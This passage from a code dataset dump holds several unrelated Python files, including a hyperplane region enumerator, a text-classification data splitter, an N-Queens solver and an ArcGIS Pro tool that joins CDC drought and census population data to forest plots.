np.all(-H2[intIdx[idx],1:]@x - H2[intIdx[idx],0] <= self.tol + self.rTol * np.abs(H[:,0].reshape(-1,1))))):\n # inequality is redundant, so skip it\n constraint_list[offsetIdx] = False\n else:\n to_keep.append(idx)\n else:\n H[offsetIdx,:] = -H[offsetIdx,:]\n x = region_helpers.findInteriorPoint(H,solver=solver,lpObj=self.lpIntPoint,tol=self.tol,rTol=self.rTol,lpopts=self.lpopts)\n H[offsetIdx,:] = -H[offsetIdx,:]\n if x is not None:\n # If x satisfies all of the original constraints then it is a redundant hyperplane\n # intersecting with at least d other hyperplanes\n notAdjacent = np.all(-H[:,1:] @ x - H[:,0].reshape(-1,1) <= self.tol + self.rTol * np.abs(H[:,0].reshape(-1,1)))\n if notAdjacent:\n constraint_list[offsetIdx] = False\n else:\n to_keep.append(idx)\n witnessList.append(x)\n else:\n constraint_list[offsetIdx] = False\n if restricted:\n # We are not solving full LPs, so the witness points aren't meaningful...\n return to_keep, []\n else:\n return to_keep, witnessList\n\n @coro\n def processNodeSuccessorsFastLP(self,INTrep,N,H,payload=[],solver='glpk',lpopts={},witness=None,xN=None,face=None,adj=None):\n # INTrep = INTrep[0]\n # We assume INTrep is a list of integers representing the hyperplanes that CAN'T be flipped\n # t = time.time()\n witnessList = []\n INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n\n\n # Flip the un-flippable hyperplanes; this must be undone later\n H[INTrep,:] = -H[INTrep,:]\n\n\n d = H.shape[1]-1\n\n\n\n constraint_list = None\n\n\n faces, witnessList = self.thisProxy[self.thisIndex].concreteMinHRep(H,constraint_list,boolIdxNoFlip,intIdxNoFlip,intIdx,solver=solver,interiorPoint=witness,ret=True).get()\n\n successors = []\n for idx in range(len(faces)):\n i = faces[idx]\n if boolIdxNoFlip[intIdx[i]//8] & 1<<(intIdx[i] % 8) == 0:\n # boolIdxNoFlip[intIdx[i]] = 1\n # t = time.time()\n boolIdxNoFlip[intIdx[i]//8] = boolIdxNoFlip[intIdx[i]//8] | 1<<(intIdx[i] % 8)\n insertIdx = 0\n while insertIdx < len(intIdxNoFlip) and intIdxNoFlip[insertIdx] < intIdx[i]:\n insertIdx += 1\n temp = copy(intIdxNoFlip)\n temp.insert(insertIdx,intIdx[i])\n successors.append( \\\n [ copy(boolIdxNoFlip), tuple(temp), self.flippedConstraints.N, (intIdx[i],) if self.sendFaces else tuple() , None if witness is None else witnessList[idx], None, None ]\n )\n boolIdxNoFlip[intIdx[i]//8] = boolIdxNoFlip[intIdx[i]//8] ^ 1<<(intIdx[i] % 8)\n # self.conversionTime += time.time() - t\n t = time.time()\n if not self.doRS:\n cont = self.thisProxy[self.thisIndex].hashAndSend(successors[-1],ret=True).get()\n else:\n cont = True\n self.stats['xferTime'] += time.time() - t\n\n if not cont:\n H[INTrep,:] = -H[INTrep,:]\n return successors, -1, witnessList\n if not self.doRS and self.sendFaces and not isinstance(self.clearTable,str):\n self.thisProxy[self.thisIndex].hashAndSend([copy(boolIdxNoFlip),copy(intIdxNoFlip),self.flippedConstraints.N,[copy(ii[3][0]) for ii in successors]], ret=True).get()\n # facesInt = np.full(self.N,0,dtype=bool)\n sel = tuple(np.array(intIdx,dtype=np.uint64)[faces].tolist())\n # facesInt[sel] = np.full(len(sel),1,dtype=bool)\n\n # Undo the flip we did before, since it affects a referenced (as opposed to copied) array:\n H[INTrep,:] = -H[INTrep,:]\n\n # return [successors, bytes(np.packbits(facesInt,bitorder='little'))]\n if not self.doRS:\n return [], sel, witnessList\n else:\n return successors, sel, witnessList\n\n @coro\n def processNodeSuccessorsInsertHyperplane(self,INTrep,N,H,payload=[],solver='glpk',lpopts={},witness=None,xN=None,face=None,adj=None):\n witnessList = []\n # Note the N passed here includes the inserted hyperplane, and INTrep will always be of the same length\n boolIdxNoFlipFull, INTrepFull, _ = region_helpers.recodeRegNewN(0, INTrep, N)\n boolIdxNoFlip, INTrep, _ = region_helpers.recodeRegNewN(-1, INTrep, N)\n # INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n\n # We have to retrieve the information from the node in the table that is going to be split\n q = self.thisProxy[self.thisIndex].query( [boolIdxNoFlip, INTrep, N-1], ret=True).get()\n if q[0] > 0:\n oldFace = q[1]\n oldWitness = q[2]\n oldAdj = q[3]\n oldPayload = q[4]\n else:\n raise ValueError\n print(f'()()() q = {q}')\n rebasedINTrep = set(region_helper.recodeRegNewN(-1,self.flippedConstraints.rebaseRegion(INTrepFull),N))\n validFlips = oldFace - rebasedINTrep\n\n\n # Flip the un-flippable hyperplanes; this must be undone later\n # Again note that H contains the inserted hyperplane\n H[INTrep,:] = -H[INTrep,:]\n\n\n d = H.shape[1]-1\n\n\n\n constraint_list = None\n\n\n H[INTrep,:] = -H[INTrep,:]\n\n\n\n\ndef Union(contribs):\n return set().union(*contribs)\n\nReducer.addReducer(Union)\n\ndef DictAccum(contribs):\n result = defaultdict(int)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] += trib[ky]\n return result\n\nReducer.addReducer(DictAccum)\n\ndef DictListJoin(contribs):\n result = defaultdict(list)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] += trib[ky]\n return result\n\nReducer.addReducer(DictListJoin)\n\ndef DictSetUnion(contribs):\n result = defaultdict(set)\n for trib in contribs:\n for ky in trib.keys():\n result[ky] |= trib[ky]\n return result\n\nReducer.addReducer(DictSetUnion)\n\n","repo_name":"jferlez/HyperplaneRegionEnum","sub_path":"posetFastCharm.py","file_name":"posetFastCharm.py","file_ext":"py","file_size_in_byte":61505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20989403700","text":"#_*_coding:utf-8_*_\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ntrain_data = pd.read_csv('../data/raw_data/train_set.csv',sep=',')\ntest_data = pd.read_csv('../data/raw_data/test_set.csv',sep=',')\n#统计所有的类别数\nclass_label_num = train_data.groupby('class').count()\n'''\ntrain_test_split: randow_state:随机种子,random_state=0 ,每次split的结果都不一样\n'''\ntrain_dataset,val_dataset = train_test_split(train_data.iloc[1:],test_size=0.1,random_state=0)\n\ntrain_dataset.to_csv('../data/split_data/train_set.csv',index=False)\nval_dataset.to_csv('../data/split_data/val_set.csv',index=False)\n\ntrain_dataset[['article','class']].to_csv('../data/article/train_set.csv',index=False)\nval_dataset[['article','class']].to_csv('../data/article/val_set.csv',index=False)\ntest_data[['article']].to_csv('../data/article/test_set.csv',index=False)\n\ntrain_dataset[['word_seg','class']].to_csv('../data/word/train_set.csv',index=False)\nval_dataset[['word_seg','class']].to_csv('../data/word/val_set.csv',index=False)\ntest_data[['word_seg']].to_csv('../data/word/test_csv.csv',index=False)\n","repo_name":"TianWuYuJiangHenShou/textClassifier","sub_path":"data_processing/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"759218349","text":"import webapp2\nfrom jinja_templates import jinja_environment\nimport spreadsheet_index\nimport datastore_index\nfrom main import decorator\n\n\nclass SyncMassesHandler(webapp2.RequestHandler):\n\n @decorator.oauth_required\n def get(self):\n # get the contents of the index spreadsheet\n index_masses_mgr = spreadsheet_index.Masses(oauth_decorator=decorator)\n self.index_masses = index_masses_mgr.sync_table()\n\n # get the contents of the datastore\n datastore_masses_mgr = datastore_index.Masses()\n self.datastore_masses = datastore_masses_mgr.sync_table()\n\n # copy the data in the index to the datastore\n # get the rows for which biblerefs are updated during registration\n updated_index_rows = datastore_masses_mgr.bulkload_table(self.index_masses)\n\n # update the spreadsheet index entries\n index_masses_mgr.update_fields(updated_index_rows)\n\n # find obsolete datastore entities (no spreadsheet index entry with same id)\n obsolete_entities = {}\n self.find_obsolete_entities(obsolete_entities)\n\n # delete the obsolete datastore entities\n datastore_masses_mgr.delete_entities(obsolete_entities)\n\n # the app redirects the user to the index\n template = jinja_environment.get_template('list-masses.html')\n self.response.out.write(template.render(masses=self.datastore_masses))\n\n def find_obsolete_entities(self, d):\n index_ids = [i['id'] for i in self.index_masses]\n for i in self.datastore_masses:\n id = i['id']\n if id not in index_ids:\n d[id] = {}\n\n","repo_name":"vicmortelmans/catholicmissale","sub_path":"sync_masses_index.py","file_name":"sync_masses_index.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22675719036","text":"# time over\n\ndef check(row, col, chk_arr, n):\n for i in range(n):\n if i == row:\n continue\n if chk_arr[i][col]:\n return False\n\n x = row - 1\n y = col - 1\n while x >= 0 and y >= 0:\n if chk_arr[x][y] == True:\n return False\n x -= 1\n y -= 1\n\n x = row - 1\n y = col + 1\n while x >= 0 and y < n:\n if chk_arr[x][y] == True:\n return False\n x -= 1\n y += 1\n\n return True\n\ndef calc(row, chk_arr, ans, n):\n if row == n:\n ans[0] += 1\n\n for col in range(n):\n chk_arr[row][col] = True\n if check(row, col, chk_arr, n):\n calc(row + 1, chk_arr, ans, n)\n chk_arr[row][col] = False\n\n\nans = [0]\nn = int(input())\nchk_arr = [[False] * n for i in range(n)]\ncalc(0, chk_arr, ans, n)\nprint(ans[0])\n","repo_name":"ino-jeong/study-practice","sub_path":"baekjoon online judge/09663 n_queen/n_queen(2).py","file_name":"n_queen(2).py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17841676054","text":"my_pizzas = ['margarita', 'hawaiana', 'sweet pork', 'sweet pork philadelpia']\n\nfriend_pizzas = my_pizzas[:]\n\nmy_pizzas.append('bacon supreme')\n\nfriend_pizzas.append('paisa')\n\nprint(f'my favorite pizzas are: ')\n\nfor pizza in my_pizzas:\n\tprint(pizza)\n\nprint(f\"my friend's favorite pizza are: \")\nfor pizza in friend_pizzas:\n\tprint(pizza)","repo_name":"3venjd/PythonCrashCourse","sub_path":"Chapter_4/excercise4_11.py","file_name":"excercise4_11.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19596403501","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Section 1 : Reading a CSV and Create Point FeatureClass of Plot Data\n\n# ## Step 1.\n# **Import Python Modules**\n# - arc modules\n# - arcgis gives access to arcgis api\n# - arcpy gives access to eveything available in arcpro software (functions, layout etc.)\n# - other moduels\n# - pandas is used for data analysis and manipulation\n# - numpy also used for data analysis and manipulation (some pandas reliant on numpy)\n# - sodapy is a module recommended by CDC to use their API\n# - zipfile used to unzip zipfiles\n# - os gives access to basic functionalities of the computer (creating folders, path names, etc.)\n\n# In[1]:\n\n\nimport arcgis\nimport arcpy\nimport pandas as pd\nimport numpy as np\nimport sodapy\nfrom zipfile import ZipFile\nimport os\nimport json\nimport requests\n\n\n# ## Step 2.\n# **set up inputs to convert CSV to featureclass**\n\n# In[2]:\n\n\n# set up directory and geodatabase\n\nspace = arcpy.GetParameterAsText(0)\n# space = \"C:\\\\Users\\\\hjs5td\\\\Desktop\"\n\nincsv = arcpy.GetParameterAsText(1)\n#\"C:\\\\Users\\\\hjs5td\\\\Box Sync\\\\FIA Project\\\\FIA_Python\\\\plot_sample_9May19.csv\"\n\n# these are the names of longitude and latitude in your CSV \n\nlongitude = arcpy.GetParameterAsText(2)\n#'lon'\n\nlatitude = arcpy.GetParameterAsText(3)\n#'lat'\n\nplot_year = arcpy.GetParameterAsText(4) \n#\"invyr\"\n\nusename = arcpy.GetParameterAsText(5)\n\npasswrd = arcpy.GetParameterAsText(6)\n\nkey = arcpy.GetParameterAsText(7)\n\n\n# ## Step 3.\n# **create a geodatabase where we will store our data**\n\n# In[3]:\n\n\noutgdb = \"AdvGIS_proj.gdb\"\nworkspace = os.path.join(space, outgdb)\n\nif arcpy.Exists(workspace):\n arcpy.Delete_management(workspace)\n\narcpy.CreateFileGDB_management(space,outgdb)\n\narcpy.env.workspace = workspace\narcpy.env.overwriteOutput = True\n\n\n# ## Step 4.\n# **create a featureclass from CSV**\n\n# In[4]:\n\n\n#define name of featureclass to go into geodatabase\nplots = \"plots\"\nplottab = \"plot_table\"\n\n#GCS_WGS_1984 geographic coordinate system\nsr = arcpy.SpatialReference(4326)\n\n# web mercator\n#sr = arcpy.SpatialReference(3857)\n\n#USA_Contiguous_Albers_Equal_Area_Conic_USGS_version projected coordinate system\npr = arcpy.SpatialReference(102039) \n\n#from pyproj import Proj,transform\n\n#arcpy.TableToTable_conversion(incsv,workspace,plottab)\n\n#cursor = arcpy.da.UpdateCursor(plottab, [longitude,latitude])\n\n#for row in cursor:\n# lon = row[0]\n# lat = row[1]\n# newsr = transform(Proj(init='epsg:3857'), Proj(init='epsg:4326'), lon, lat)\n# newlon = newsr[0]\n# newlat = newsr[1]\n# newrow = [newlon, newlat]\n# cursor.updateRow(newrow)\n \n#del cursor\n\n# assume WGS 1984\n\narcpy.XYTableToPoint_management(incsv,plots, x_field = longitude, y_field = latitude, coordinate_system = sr)\n\n\n\nplots_proj = 'plots_proj'\n\ntransformation = 'WGS_1984_(ITRF00)_To_NAD_1983'\n\n#going from sr to pr coordinate system\n\narcpy.Project_management(plots, plots_proj, pr, transformation, sr)\n\n\n# # Section 2 : Accessing APIS and Getting Explanatory Data\n\n# # Download a Layer From ArcGIS hub\n# http://hub.arcgis.com/pages/open-data\n\n# ## Step 1.\n# **Set up text inputs for accessing various API's**\n\n# In[7]:\n\n\n# inputs:\n\n# username and password of arcgis account\n\n# census can be requested at : https://api.census.gov/data/key_signup.html \n\n\n# ## Step 2. \n# **set up numeric variables to be used for PDSI API**\n\n# In[8]:\n\n\n# used in the sql clause for CDC API\n# does not require a key or username+pass\n\nminmonth = 6\nmaxmonth = 8\nminyear = 1998\n\n\n# ## Step 3.\n# **get URL of a county feature layer from arcgis hub website.**\n\n# In[9]:\n\n\nURL = \"https://services.arcgis.com/P3ePLMYs2RVChkJx/arcgis/rest/services/USA_Counties_Generalized/FeatureServer/0/\"\ncounty_layer = arcgis.features.FeatureLayer(URL)\ncounty_layer\n\n\n# **you can use the code below to see what is allowed with this dataset; it says \"extract\" you can directly download the layer as shapefile. see https://developers.arcgis.com/python/guide/checking-out-data-from-feature-layers-using-replicas/**\n\n# In[10]:\n\n\ncounty_layer.properties.capabilities\n\n\n# ## Step 4.\n# **create a GIS() object; plot a map using the created GIS() object.** Need to create an account in order to download layers directly -- (my username and password are provided in the tool for simplicity)\n\n# In[11]:\n\n\n#gis1 = arcgis.gis.GIS(username=usename, password=passwrd)\n#map1 = gis1.map(\"Missouri\")\n#map1\n\n\n# In[12]:\n\n\n## add to a map from a url\n\n#map1.add_layer({\"type\":\"FeatureLayer\",\n# \"url\":URL,\n# })\n\n\n# In[13]:\n\n\n## print the names of the fields\n#for f in county_layer.properties.fields:\n# print(f.name)\n\n\n# ## Step 5.\n# **query all features of the layer.**\n\n# In[14]:\n\n\nall_features = county_layer.query()\n\n#print('Total number of rows in the dataset: ')\n#print(len(all_features.features))\n\n\n# ## Step 6. \n# **create spatial dataframe from the county_layer.**\n\n# In[15]:\n\n\n# store as dataframe pandas dataframe\n# this works if we can extract the features\n\n\nsdf = pd.DataFrame.spatial.from_layer(county_layer)\n\n#View first 5 rows\n\nprint(sdf.head())\n\n\n# **plot the spatial dataframe on the arcgis map, and print out the head.**\n\n# In[16]:\n\n\n#sdf.spatial.plot(map_widget=map1)\n\n\n# ## Step 7. \n# **delete the columns that we do not need**\n\n# In[17]:\n\n\nprint(list(sdf))\n\n\n# In[18]:\n\n\nkeeperlist = ['FID', 'FIPS', 'OBJECTID', 'SHAPE', 'SQMI', 'STATE_FIPS', 'STATE_NAME', 'Shape_Area', 'Shape_Leng', \n 'Shape__Area', 'Shape__Length']\n\n# FIPS = sdf.FIPS\n# print(FIPS.head())\n\nfor i in list(sdf):\n if not i in keeperlist:\n del sdf[i]\n\nprint(list(sdf)) \n\n\n# # Get and Format Drought Data\n# https://open.cdc.gov/apis.html\n\n# ## Step 8.\n# **create a string that can take inputs of minimum year, minimum month and maximum month.**\n# \n\n# In[19]:\n\n\n# from our inputs ... this will control which months the drought data is gathered from (1-12 would get all months)\n# I have set it to 6-8 because we have found that june through august is most important for forest conditions\n# later on the palmer drought severity index values are averaged over these months\n\nmonthlist = list(range(minmonth,maxmonth+1))\nfinal = str()\nlength = len(monthlist) - 1\n\nfor idx,i in enumerate(monthlist):\n if idx < length:\n string1 = \"'{}',\".format(i)\n final = final + string1\n else:\n string1 = \"'{}'\".format(i)\n final = final + string1\n \nmonthstring = \" AND month IN ({})\".format(final)\n\n# minimum value for this clause is 1894\nclause = \"year > '{}'\".format(minyear) + monthstring\n\nprint(clause)\n\n\n# ## Step 9. \n# **Using sodapy library (recommended by CDC) get the drought data from CDC API.** set limit to something large so we get all records (if excluded will only get 1000).\n\n# In[20]:\n\n\n# this gets the pdsi data from cdc website using the query speciried in the get() function\n\nclient = sodapy.Socrata(\"data.cdc.gov\", None)\nresults = client.get(\"en5r-5ds4\", where=clause, limit = 10000000)\npdsi = pd.DataFrame.from_records(results)\n\nclient.close()\n\n\n# In[21]:\n\n\nprint(pdsi.head(5))\nprint(len(pdsi))\n\n\n# ## Step 10.\n# **change datatypes of all columns.**\n\n# In[22]:\n\n\n# make sure all countyfips are stored as integers\n# countyfips is used to join to the layer\n# these are originally stored as text\n\nintlist = [\"countyfips\",\"year\",\"month\",\"statefips\"]\n\nfor i in list(pdsi):\n if i in intlist:\n pdsi[str(i)] = pd.to_numeric(pdsi[str(i)],downcast='integer')\n else:\n pdsi[str(i)] = pd.to_numeric(pdsi[str(i)],downcast='float')\n\n \n\n\n# ## Step 11.\n# **iterate through yearlist and store dataframes in dictionary.** merge all dataframes to one dataframe called all_drought.\n\n# In[23]:\n\n\n\n# get the maximum value from pdsi[\"year\"] column\nmaxyear = max(pdsi[\"year\"])\n\n# min year plus one because we used > min year not => minyear\n# we will iterate through this list and use values as keys/column names\n\nyearlist = list(range(minyear+1,maxyear+1))\n\n# create dictionary to easily store dataframes as we iterate\nD = {}\n\n# enumerate the list so we can know when we are on the first iteration (see below)\n\nfor idx,i in enumerate(yearlist):\n # get values where year == i\n D[i] = pdsi[pdsi.year == i]\n # monthlist defined in step 8\n D[i] = D[i][D[i].month.isin(monthlist)]\n # groupby county and find the average pdsi across the months in our list\n D[i] = D[i].groupby(['countyfips'])[['pdsi']].mean().reset_index()\n # get a string of the value in yearlist\n yearsuf = str(i)\n # create a column name\n pdsiname = \"pdsi{}\".format(yearsuf)\n # reassign the column name to the PDSI column\n D[i] = D[i].rename(columns={'pdsi': pdsiname})\n # if it is the first iteration than store the dataframe as all_drought\n if idx == 0:\n all_drought = D[i]\n # otherwise merge the dataframes on the county number\n else:\n all_drought = all_drought.merge(D[i], how='inner', on='countyfips')\n # print(len(all_drought))\n\ndel D\n\n\n# In[24]:\n\n\nprint(all_drought.head())\n\n\n# ## Step 12.\n# **Make sure that FIPS in the spatial dataframe is stored as an integer. Then merge the drought data to the county data using the countyfips and FIPS keys.**\n\n# In[25]:\n\n\nsdf['FIPS'] = pd.to_numeric(sdf['FIPS'],downcast='integer')\n\n\n# In[26]:\n\n\npdsicounty = sdf.merge(all_drought, how='inner', left_on='FIPS', right_on='countyfips')\n\n\n# In[27]:\n\n\nprint(pdsicounty.head())\n\n\n# In[28]:\n\n\nprint(list(pdsicounty))\n\n\n# ## Step 13.\n# **write our merged spatial dataframe to a feature class.** store it in the geodatabase.\n\n# In[29]:\n\n\npdsipath = os.path.join(workspace,\"pdsi\")\n\npdsicounty.spatial.to_featureclass(location = pdsipath)\n\n\n# # Get and Download Population Data\n\n# ## Step 14.\n# **access the census API for county level population estimates using for years 2000 to 2010**\n\n# In[30]:\n\n\n## see https://api.census.gov/data/2000/pep/int_population/examples.html ##\n\n# this gets county level population estimates from 2000 to 2010\n\nURL = \"https://api.census.gov/data/2000/pep/int_population?get=COUNTY,DATE_DESC,POP,GEONAME&for=county:*&in=state:*&key={}\".format(key)\n\ndata = requests.get(URL)\n\ndata\n\n\n# ## Step 15.\n# **convert json to nested list using the json() function**\n\n# In[31]:\n\n\ndatajson = data.json()\n\n\n# ## Step 16.\n# **use pandas to write a dataframe from the datajson list**\n\n# In[32]:\n\n\ncp = pd.DataFrame.from_records(datajson)\n\n\n# In[33]:\n\n\nprint(cp.head())\nprint(len(cp))\n\n\n# In[34]:\n\n\nlist(cp)\n\n\n# ## Step 17.\n# **make the first row the coulumn names and drop that row**\n\n# In[35]:\n\n\ncp.columns = cp.iloc[0]\ncp = cp.reindex(cp.index.drop(0))\n\n\n# In[36]:\n\n\nprint(list(cp))\nprint(len(cp))\n\n\n# In[37]:\n\n\nprint(cp.head())\n\n\n# ## Step 18.\n# **do the same thing for county level data from 2010 to 2018**\n\n# In[38]:\n\n\n\n# if we do not include \"DATE_CODE\" than we only get the 2018 estimate\nURL = \"https://api.census.gov/data/2018/pep/population?get=COUNTY,DATE_CODE,DATE_DESC,POP,GEONAME&for=county:*&in=state:*&key={}\".format(key)\n\ndata = requests.get(URL)\n\ndatajson = data.json()\n\n\n# In[39]:\n\n\nncp = pd.DataFrame.from_records(datajson)\n\nncp.columns = ncp.iloc[0]\nncp = ncp.reindex(ncp.index.drop(0))\n\n# delete DATE_CODE\ndel ncp[\"DATE_CODE\"]\n\n\n# ## Step 19. \n# **concatenate the two dataframes (stack them on top of one another); must have same columns; reset the index so that all values are unique and delete the old index column**\n\n# In[40]:\n\n\n# since we redefine cp here make sure that we rerun the first request sequence before we concatanate dataframes again\n\ncp = pd.concat([ncp,cp], axis=0, sort = False, join='outer',ignore_index=True)\n\n\n# In[41]:\n\n\ncp = cp.reset_index()\n\n\n# In[42]:\n\n\ndel cp[\"index\"]\n\n\n# ## Step 20. \n# **iterate through the indexes of the cp dataframe to format the FIPS and year variables.** I tried usiung datetime package but it was simpler to just format it on my own.\n\n# In[43]:\n\n\nstringlist = [\"population estimate\", \"population estimates base\",\"Census 2010 population\",\"Census population\"]\n\n# create an empty column year\ncp[\"year\"] = \"\"\n#create an empty column FIPS\ncp[\"FIPS\"] = \"\"\n#create an empty list to store year values\nyearlist = list()\n\n# iterate through the indexs\n# iterating through a pandas dataframe\nfor i in cp.index:\n datestr = cp.at[i,\"DATE_DESC\"]\n county = str(cp.at[i,\"county\"])\n state = str(cp.at[i,\"state\"])\n FIPS = int(state + county)\n cp.at[i,\"FIPS\"] = FIPS\n # if any(x in datestr for x in stringlist):\n for y in stringlist:\n # check to see if datestr created above ends with any value in the list\n if datestr.endswith(y):\n # get the length of the text that the datestr endswith\n length = len(y)\n # create a negative integer value from that length\n position = -length\n # new string excluding that text\n new_datestr = datestr[:position]\n # new string excluding month and day\n # includes the space and the year I beleive\n new_year = new_datestr[-5:]\n # convert to integer\n year = int(new_year)\n # assign value\n cp.at[i,\"year\"] = year\n # to check the min and max later on\n yearlist.append(year)\n\n# we need to drop duplicates because each county includes a baseline 2000 census estimate and an additional 2000 estimate\n# I sort values so that we are always dropping the baseline estimate\n \ncp = cp.sort_values(['state','county','year'], axis=0, ascending=True,kind='quicksort', na_position='first')\n\ncp = cp.drop_duplicates(subset=['state','county','year'], keep='last', inplace=False) \n\nprint(cp.head())\nprint(cp)\n\n\n# ## Step 21.\n# **create a new list of the minimum year and the maximum years found in the dataframe**\n\n# In[44]:\n\n\nyeararray = np.array(yearlist)\n\nx = min(yeararray)\ny = max(yeararray)\n\nyearlist = list(range(x,y+1))\n\ndel yeararray\nprint(list(cp))\n\n\n# ## Step 22.\n# **select rows by year; rename column; mrege dataframes (same as drought method)**\n\n# In[45]:\n\n\nD = {}\n\nfor idx,i in enumerate(yearlist):\n print(i)\n D[i] = cp[cp.year == i]\n # groupby county and find the average pdsi\n yearsuf = str(i)\n name = \"pop{}\".format(yearsuf)\n D[i] = D[i].rename(columns={'POP' : name})\n if idx == 0:\n all_pop = D[i]\n else:\n # get a subselection of columns\n D[i] = D[i][[name, 'FIPS']]\n print(list(D[i]))\n all_pop = all_pop.merge(D[i], how='inner', on='FIPS')\n #print(len(all_pop))\n #print(idx)\n\n\n# ## Step 23.\n# **merge pop data to spatial dataframe**\n\n# In[46]:\n\n\npopcounty = sdf.merge(all_pop, how='inner', on='FIPS')\nlist(popcounty)\n\n\n# ## Step 24.\n# **write population data to geodatabse**\n\n# In[47]:\n\n\npoppath = os.path.join(workspace,\"pop\")\n\n\npopcounty.spatial.to_featureclass(location = poppath)\n\n\n# ## Step 25.\n# **Spatial Joins of Point**\n# \n# https://developers.arcgis.com/python/guide/spatially-enabled-dataframe-advanced-topics/#Spatial-Joins\n\n# In[48]:\n\n\narcpy.MakeFeatureLayer_management(plots_proj, 'tempplots')\narcpy.MakeFeatureLayer_management(pdsipath, 'temppdsi')\narcpy.MakeFeatureLayer_management(poppath, 'temppop')\n\n\n# In[49]:\n\n\norig = arcpy.ListFields('tempplots')\noriglist = list()\n\n\nfor i in orig:\n x = i.name\n origlist.append(x)\n\n\n# In[50]:\n\n\ntemp = \"temporaryjoin\"\n\narcpy.SpatialJoin_analysis('tempplots','temppop',temp, join_operation = 'JOIN_ONE_TO_ONE', join_type = 'KEEP_ALL', match_option = 'CLOSEST')\n\n\n# In[51]:\n\n\ntemp1 = \"temporatyjoin1\"\n\narcpy.SpatialJoin_analysis(temp,'temppdsi',temp1, join_operation = 'JOIN_ONE_TO_ONE', join_type = 'KEEP_ALL', match_option = 'CLOSEST')\n\n\n# In[52]:\n\n\npltdf = pd.DataFrame.spatial.from_featureclass(temp1)\n\n\n# In[53]:\n\n\ndeletelist = ['OBJECTID',\n 'Join_Count',\n 'TARGET_FID',\n 'Join_Count_1',\n 'TARGET_FID_1',\n 'Field1',\n 'FID_1',\n 'FIPS_1',\n 'SQMI_1',\n 'STATE_FIPS_1',\n 'STATE_NAME_1',\n 'Shape_Leng_1',\n 'Shape__Area_1',\n 'Shape__Length_1',\n 'countyfips',\n 'STATE_FIPS',\n 'STATE_NAME',\n 'Shape_Leng',\n 'Shape__Area',\n 'Shape__Length',\n 'COUNTY',\n 'DATE_DESC','FID']\n\nfor i in deletelist:\n if hasattr(pltdf, i):\n del pltdf[i]\n\nlist(pltdf)\n\n\n# In[54]:\n\n\nyearlist = list(range(2000,2018))\ncolumnlist = list(pltdf)\n\npltdf['final_pdsi'] = \"\"\npltdf['final_pop'] = \"\"\n\nfor i in pltdf.index:\n popstr = str(int(pltdf.at[i,plot_year]))\n pdsistr = str(int(pltdf.at[i,plot_year]) - 1)\n for y in columnlist:\n if popstr in y:\n if y.startswith('pop'):\n pltdf.at[i,\"final_pop\"] = pltdf.at[i,y]\n elif pdsistr in y:\n if y.startswith('pdsi'):\n pltdf.at[i,\"final_pdsi\"] = pltdf.at[i,y]\n\n \n\n\n# In[55]:\n\n\nnewlist = ['FIPS','SQMI','final_pdsi','final_pop']\nfor i in newlist:\n origlist.append(i)\n\n\n# In[56]:\n\n\nfor y in list(pltdf):\n if not y in origlist:\n del pltdf[y]\n\n\n# In[57]:\n\n\npltdf['final_pop'] = pd.to_numeric(pltdf['final_pop'],downcast='float')\npltdf['SQMI'] = pd.to_numeric(pltdf['SQMI'],downcast='float')\n\npltdf.loc[:,'poparea'] = pltdf.final_pop / pltdf.SQMI\n\n\n# In[58]:\n\n\nplotpath = os.path.join(workspace,\"update_plots\")\ncsvpath = os.path.join(space,\"SudekumPlotSampleUpdate.csv\")\n\npdsicounty.spatial.to_featureclass(location = plotpath)\npltdf.to_csv(csvpath)\n\n","repo_name":"houstonsudekum/arcpro_drought_population_tool","sub_path":"arcpro_drought_pop_tool.py","file_name":"arcpro_drought_pop_tool.py","file_ext":"py","file_size_in_byte":17189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2638993199","text":"from typing import Dict, Tuple, List, Iterable\nfrom overrides import overrides\nfrom conllu.parser import parse_line, DEFAULT_FIELDS\n\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, TextField, SequenceLabelField, MetadataField, ArrayField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Token\n\nfrom .baseline_slam_reader import unpack_token_index, lazy_parse, FIELDS\n\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\ntoken_features = ['Gender', 'Person', 'VerbForm', 'Definite', 'Mood', 'PronType', 'fPOS', 'Number', 'Tense']\n\n@DatasetReader.register(\"slam_reader\")\n@DatasetReader.register(\"slam-reader\")\nclass SLAMDatasetReader(DatasetReader):\n \"\"\"\n Reads in a CoNLL-U formatted SLAM dataset, including all Duolingo-specific\n and UD-specific features.\n\n Parameters\n ----------\n token_indexers : ``Dict[str, TokenIndexer]``, optional (default=``{\"tokens\": SingleIdTokenIndexer()}``)\n The token indexers to be applied to the words TextField.\n \"\"\"\n def __init__(self,\n token_indexers: Dict[str, TokenIndexer] = None,\n include_pos_features: bool = False,\n lazy: bool = False) -> None:\n super().__init__(lazy)\n self._token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}\n self._include_pos_features = include_pos_features\n\n @overrides\n def _read(self, file_path: str):\n # if `file_path` is a URL, redirect to the cache\n file_path = cached_path(file_path)\n # i = 0\n\n with open(file_path, 'r') as conllu_file:\n logger.info(\"Reading token instances from conllu dataset at: %s\", file_path)\n\n for annotation, features in lazy_parse(conllu_file.read(), 